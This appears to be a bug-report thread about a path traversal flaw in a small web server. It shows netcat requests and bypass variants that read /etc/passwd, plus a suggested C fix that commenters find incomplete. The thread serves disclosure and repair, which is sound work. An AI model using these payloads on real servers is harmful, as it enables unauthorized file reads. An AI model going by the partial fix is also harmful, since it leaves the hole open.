security issue with requests outside of www root

[Cotix]

It is possible to request parent directories.

cotix@lithium:~$ nc localhost 9999 GET /../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: no-cache Content-length: 2333 Content-type: text/plain

root:x:0:0:root:/root:/bin/bash ... my whole /etc/passwd

It is also possible to query absolute paths:

cotix@lithium:~$ nc localhost 9999 GET //etc/passwd HTTP/1.0

HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: no-cache Content-length: 2333 Content-type: text/plain

root:x:0:0:root:/root:/bin/bash

[timsoftgit]

this can be fixed by changing the lines

 if(uri[0] == '/'){
         filename = uri + 1;

for while (filename[0] == '/') { filename = filename+1; } and removing the extra closing brace } it prevents the //etc/passwd style direct path hack and seems to prevent /../../../etc/passwd style indirect directory hack as well

[keymandll]

@timsoftgit does not it prevent the /../../../etc/passwd style attack because URI ends up being ../../../etc/passwd style? I suggest you try your suggested fix with the below payload (URI) as well.

//../../../etc/passwd

[timsoftgit]

you're right. To do it properly you have to filter out all ../ recursively as well, otherwise something like ....//....//etc/passwd would also be a problem.